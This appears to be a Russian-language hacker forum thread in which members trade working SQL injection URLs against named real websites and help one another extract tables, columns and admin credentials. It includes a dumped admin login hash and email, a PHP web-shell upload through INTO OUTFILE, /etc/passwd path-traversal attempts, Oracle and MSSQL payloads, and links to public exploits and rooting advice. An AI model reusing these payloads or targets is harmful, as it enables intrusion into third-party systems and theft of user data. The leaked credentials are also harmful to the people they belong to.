можно ли еще что-нибудь сделать в такой ситуации?

sabe
Что вы так боитесь подзапросы, один раз разобраться, и всё станет понятно в дальнейшем
Вот пример(точнее один из вариантов), всё просто
Подбираем таблицу:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+table_name+from+information_schema.tables+li mit+17,1),1,11))='admin_users'
Далее, вывод значения:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+password+from+admin_users+limit+0,1),1,2))=' mu'Это незаконченный вывод
Добивать не стал. кому нужно разберутся )

Разумеется скриптами всё будет гораздо быстрее чем вручную

В админки есть возможность делать запросы к базе
Помогите составить правильно запрос чтобы закачать файл на сервер.
Сори если не туда.

Нашел очередную скулю на сайте какогото импортного хостера:
http://www.agenciarwebhost.com.br/planos/index.php?id=-1'
Подскажите, как раскрутить? И в чем там вообще проблема?
:)

http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+i n+'.'
выдает: Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.
кто дальше пробьется?

кто дальше пробьется?
А куда дальше-то? Обычная скуль, MSSQL, отлично крутится всё в порядке, никаких аномалий

http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('tbl_comp s','all_tovar','allprice','banner'))--

и т.д

я новичек.скажите как достать хеш и чем?

http://mirinfo.ru/cat/zapas.aspx?num=1'


скуля?

я новичек.скажите как достать хеш и чем?
откуда? o_O

я новичек.скажите как достать хеш и чем?
Руками.

http://mirinfo.ru/cat/zapas.aspx?num=1'


скуля?

Да. Вроде бы )

кто раскрутить помогет?

Thrasher88
фильтрирует...

F4R
заабей... )

юниона нема? (
http://www.hawkingtech.com/downloads.php?file_id=2340+union+select+1/*
иьект у мусаров?
http://rpolice.ru/download.php?file_id=-176+or+1=1

http://dixis.ru/actions.php?act_id=-347+union+select+1,version(),table_name,4,5,6,7,8, 9,10,11,12+from+information_schema.tables+limit+1, 1%20--

почему ошибка?

Для начало - там 13 столбцов...

http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(table_name,0x3a, table_rows),4,5,6,7,8,9,10,11,12,13+from+informati on_schema.tables--

To sabe:

http://www.hawkingtech.com/downloads.php?file_id=2340+and+substring(version() ,1,1)=3

3-я ветка..

а как например вывести колонки из IMEI_users ???
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name,0x3a ),4,5,6,7,8,9,10,11,12,13+from+information_schema. columns--

Вот так.

http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5 ,6,7,8,9,10,11,12,13+from+information_schema.colum ns+where+table_name=0x494d45495f7573657273--

Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!

Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!

Да, но даже при меджик квотс = он можно выкрутиться, вот смотри: https://forum.antichat.ru/showpost.php?p=663815&postcount=39

Меня это спасало не один раз, да и имея возможность читать сорцы сайта, можно найти ещё какую-нидь уязвимость или туже "двойную скулю", но в другом скрипте.

По-идее при SQL-инъекции в MySQL можно использовать команду UPDATE, так? Подскажите, как тогда будет выглядеть запрос к БД? Примерно так?

http://localhost/index.php?id=-1+update+1,2,3,4,5,6+название_таблиц ы+set+password='admin'+where+id='1'--

sql надо изучать с бд, а не с sql-inj тогда не будет таких глупых вопросов :)

Народ пытаюсь обновить колонку (инфу о юзере) и когда жму на EDIT
то выскакивает редактирование ПУСТЫХ полей! в чем дело??? Прова на запись есть! (раньше редактировал)

>update table set a='1',b='2'... where user=1
its maybe successed/access denied

Вот еще
У меня иногда выскакивает табли4ка в шелле
"Owned by root"
что это?

С наступающим, думаю то, что я хочу спросить уже обсуждалось кучу раз и видимо поэтому я не знаю по каком тексту ее искать.

Вот пример из квеста m4g'a - http://m4g.ru/quest/lvlvlvl2.php?lang=ru

да, чтобы зайти на второй уровень нужно вот тут http://m4g.ru/quest/lvl1.php в поле пароля что-нибудь вроде ') or ('a'='a ввести.

Так вот значит http://m4g.ru/quest/lvlvlvl2.php?lang=ru
К любому файлу дописывается .php - вопрос - что делать?

Никак не въеду, нашел все таблицы, но при вводе:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+name+from+shopusers)
выдает:
ошибка '80020009'

/reviews/default.asp, line 41


Помогите плз!!!!

Вот вопрос
нашел сайт подставил ' и выдало
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/l***/l******/pages/price.php on line 77

вот че
наскоко я понисаю ето раскритие путей но може ето скуль??? Кто знает напишите и че с ним делать дальше?

Может и скуль. Но информации слишком мало, чтобы понять есть скуль или нет.

Кинь ссылку - скажу точнее.

спс что отозвался)) значит все-же надежда есть) Пошол ковырять
Ссыль пока не кину ибо хочу сам научиться)

скорее всего скуля

R1dex
кинул ссілку=)) а то чето непонимаю есть или нет

Подскажите, как можно обойти ограничение в поиске гугла, когда набираешь, к примеру, inurl: , то можно посмотреть только определенное кол-во страниц.. возможно ли это как то обойти?

1)В настройках поиска поставить макс. количество результатов на странице
2)Юзать поиск icq.com

Так че насчет моей проблемы слабо чтоли?

1)В настройках поиска поставить макс. количество результатов на странице
2)Юзать поиск icq.com
только что попробовал оба метода - везде происходит блокировка после определенного числа показанных ссылок :(

слабо чтоли?
с таким отношением тебе врятли кто-то будет отвечать на вопрос, тем более что он поднимается каждую третюю страницу;
поиск заюзать "слабо чтоли" ? трассировка к сайту не идет, предположительно там либо:
1)разные бд
2)нет доступа к _
3)нет записей в _

Gemini12, таблица пустая:
http://line.kz/reviews/?cat=13&id=1+or+0=(SELECT+TOP+1+count(*)+FROM+shopusers)

нашол багу, раскрутить неудаётся помогите плиз)
http://www.ural.tvoe.tv/?page=abonents&id=1188%27

нашол багу, раскрутить неудаётся помогите плиз)
че там крутить то...
http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5/*
h000153_1_1@localhost:5.0.32-Debian_7etch8-log:h000153_1

че там крутить то...
Если умеешь тока кавычку ставить, то не просто "что там крутить"))))

http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=0x20096e6b735f61 646d696e+limit+1,1%20--

табличка nks_admin
и как я понимаю нету записей?

табличка nks_admin
и как я понимаю нету записей?



http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=char(110,107,115 ,95,97,100,109,105,110)--

http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,concat(id,0x3a,login,0x3a,passwor d,0x3a,email),3,4,5+from+nks_admin--
1:root:741de08d7a4cd7c4:info@nks-euroasia.ru

http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=char(110,107,115 ,95,97,100,109,105,110)--

где можно про это почитать?
я просто такого никогда не видел)

где можно про это почитать?

про char() ?

char(ASCII,ASCII, ... )

перевести можно тут (http://text.cav.in/) например... ;)

про char() ?

char(ASCII,ASCII, ... )

перевести можно тут (http://text.cav.in/) например... ;)


ВСЁ ОТЛИЧНО ВСЁ ПОНЯЛ)_)) ОГРОМНОЕ СПС ) ОСОБЕННО ТЕБЕ!

ещё если не сложно подкинька хороших линком на с=татейки про атаки на SQL

2 F4R
http://forum.antichat.ru/threadnav43966-1-10.html
injection.rulezz.ru

обьясните чё такое шеллы для чего они нужны и где их брать

Всем здрасти...
И так есть шелл на сайте (на выделенном сервере)
так вот как его порутать? нужно полное руководство!

gurman94,вот отрыл на винте хорошую статейку.Сайта с которого я её копирнул уже нет.

_http://slil.ru/26503661

Windows NT WIN-LT7NWBWEQ7D 6.0 build 6001 (то что в uname -a стоит)

под эту версию есть сплоит? просто я на секьюритьси-лаб не нашол
и даже не знаю где искать! в гугле тоже самое!

Если будете искать сплойт, не перепутайте с сплойтом для ddos системы...я однажды попался, потом неделю сайт с хорошими пузомерками лежал..выделенный сервер хотел порутать называется.

А насчет сплойтов - на секлабе не будут выкладывать полноценно рабочие, это ведь ресурс о безопасности.

подскажите как быть) как изменить тип
https://guard.canberra.edu.au/natsem/index.php?mode=download&file_id=900+union+select+null,null,null,null,null, null+from+users--

http://nismo.ru/phpmyadmin/tbl_create.php кто поможет зайти вот сюда?

подскажите как быть) как изменить тип

Нет скули, вообще

Приветствую.
Подскажите, можно ли залить шелл через phpMyAdmin?
Если сморозил глупость, sorry (:

Нет скули, вообщеСкуль есть.

sabe
Ты хочешь добится вывода? Ищи дркгой параметр, сдесь помоему глухо, похоже она слепая

Octave_Parango
SELECT '<?php system($c) ?>' FROM `table` INTO OUTFILE '/полный/путь/shell.php'

Можно, при условии что у тебя есть доступ к выполнению произвольных SQL-команд и пользователь MySQL имеет привилегию FILE.
Вот статья по теме:
https://forum.antichat.ru/showthread.php?p=437118
Также в некоторых версиях phpMyAdmin есть уязвимости, с помощью которых можно залить шелл.
http://letmegooglethatforyou.com/?q=phpmyadmin%20exploit

sabe, это Oracle. Мне приходилось иметь дело с этой субд (в плане проведения инъекций) к сожалению безрезультатно (наверно я такой тупой). На античате есть статьи по сабжу

https://forum.antichat.ru/thread7157-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread7158-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread8009-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

Статьи на мой взгляд отвратительные. Вообще не читабельно (имхо). Еще есть мини статья от Подкащея вроде, но там все сбито в одну кучу. Просто так сказать некоторые особенности субд.

Желаю удачи

ElteRUS ты видимо не заметил отличную статью от [53x]Shadow по Oracle
http://forum.antichat.ru/showthread.php?t=40576

http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_ char(213),null+from+sys.dual--%20&branch=tth Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?

при запросе index.php4?lang=1' выдает ошибку
Warning: main(lang/inc.lang1'.php): failed to open stream
при таком запросе index.php4?lang=/../../../../../../../../../../../../../etc/passwd%00 ошибка
Warning: main(lang/inc.lang/../../../../../../../../../../../../../etc/passwd
как я понял он не может найти папку inc.lang(( как правильно составить?))

j0ker13. Такого файла нет, в НИКСах вылазит ошибка (может не во всех). Если бы была винда. то ты бы смог прочесть файл

to o3,14um а смысле нет файла?)) если ты про ошибку то я сам перевел что он ругается на отсуствие файла) разве это не иньект?
мне кажется что он не может найти папку которую я указал выше) т.к. своим запросом исковеркал ее имя))

Это какбы файл должен быть атким:
lang/inc.lang1.php

НО ты изменил запрос на
lang/inc.lang/
и теперь имя файла воспринимается как папка, которой не существует. Успез зависит от оси и от других папок, расположенный в этой папке=)

Если там сеть папка, с началом названия inc.lang то те повезло

2Iceangel_ ога)
2o3,14um вот и я про тоже)
кароч вот http://nouveauniveau.com/index.php4?lang=1'

http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_ char(213),null+from+sys.dual--%20&branch=tth Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?

Еще раз спрошу

http://eroking.ru/podr.php?gid=2827%27

как раскрутить?

http://eroking.ru/podr.php?gid=2827%27

как раскрутить?
_eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67--
Еще раз спрошу
там даже при повторной выборке этого столбца несовместимость типа данных ) копай через другие скрипты

eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67--

никанает (((

никанает (((Ещё как канает
http://eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67+--+

PS F4R , Мне кажется пора прочитать что-то по скулям. а не просто постить линки с ковычкой и вопросом "как раскрутить"

да там просто страница с вагиной открывается и всё)

Ещё как канает
http://eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67+--+

PS F4R , Мне кажется пора прочитать что-то по скулям. а не просто постить линки с ковычкой и вопросом "как раскрутить"

там рядом есть инъекция с выводимыми полями
http://eroking.ru/list.php?grp=-1'+union+select+1,2,3,4--+0

да там просто страница с вагиной открывается и всё)

Это как раз и означает, что все "канает".

Почитай статьи, многие вопросы отпадут.

http://forum.antichat.ru/thread43966.html
http://forum.blackhack.ru/showthread.php?p=2141

спс обоим +

Подскажите, что за версия форума phpbb.... http://forum.muo.lv/ .. и если можно то сплоит в придачу. =)

тут смотрел как определить?
http://forum.antichat.ru/thread24488.html

Лан... на это забить можно... )

Новый вопрос.... юзаж этот сплоит... http://www.milw0rm.com/exploits/2033 вроде все ок... пишет типа резаультаты в txt файл записаны, а никаких файлов на C: не появляется... в чем дело ? мож чот не так делаю ?? Версия форума ipb 2.1.6....

Все... нашел )

У меня проблема.Видел здесь на ачате скрипт чтоб рейтинг поднять на ачате,но мне не надо на ачате .Есть форум там стоит vBulletin® версия 3.7.2. Пытался немного переделать скрипт чтоб он начал крутить на форуме котором я хочу но нечего не выходит .кто знает как накрутить репу вот на етом форуме forum.travian.ru

Pashkela
скуля есть. небыло бы не выкладывал

jokester
надеялся, но так и думал.. ну как видеш сайт не очень параменистый))

ElteRUS
спс знаю что такое оракл)

[Raz0r]
хорошая статья

что это за хешш? )
ymlZqn3.fIgZ.
Ac3Jckx5.O.4I

Похоже на DES.

Похоже на DES.
хм, а разве знаки не различные должны быть в DES?

http://www.yvec.com/innerpage.php?cat_id=-3+union+select+1/*
неподбор

sabe, там 2 запроса с разным кол-вом колумнов

нашол на одном форуме ипб
в тег [img] если прописать
[ img]http://site.com/folder/script%00.jpg[ /img]
то адрес картинки получается в подписи http://site.com/folder/script
можно из этого сделать активную xss?

Помогите! Это инъекция???


http://dom2.ru/heroes/1697'

Помогите! Это инъекция???


http://dom2.ru/heroes/1697'
нет

нет
А что это тогда????

это ошибка какая-то

И как ею можно воспользоваться?

никак

Как никак! Если запрос http://dom2.ru/heroes/1697' проходит и переменая $hero.name не проверяется вот и по этому она выводится! так как она пустая функция echo выводит её не как переменю а как текст! Пример echo ("$hero.name"); из этого следует что запрос к базе прошел!!! Я не прав?

скажите пожалуйсто а рейтинг в контакте имеет уязвимости???

MatriX30000 попробуй кавычку подставить